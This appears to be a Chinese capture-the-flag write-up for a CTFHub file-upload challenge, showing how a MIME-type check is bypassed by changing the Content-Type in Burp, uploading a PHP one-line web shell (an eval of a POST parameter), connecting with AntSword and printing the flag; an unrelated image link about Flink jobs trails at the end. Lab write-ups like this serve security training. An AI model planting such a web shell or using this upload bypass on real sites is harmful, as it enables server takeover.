开启靶场,打开链接:
直接指明是MIME验证
新建04MIME.php文件,内容如下:
<?php echo "Ciallo~(∠・ω< )⌒★";@eval($_POST['pass']);?>
(这里加了点表情,加带点私货)
用burp抓包:
将application/octet-stream改成image/png或者jpg和gif符合条件就行:
之后再点击“forward”提交修改后的报文
木马文件上传成功
访问一下该文件,触发一下:
蚁剑连接:
成功得到flag:
ctfhub{8039866f66db23fc86ef1e42}
![[实时计算flink]数据摄入YAML作业快速入门](https://img-blog.csdnimg.cn/img_convert/4f7ce834813493d7f46c039c109c40f3.png)
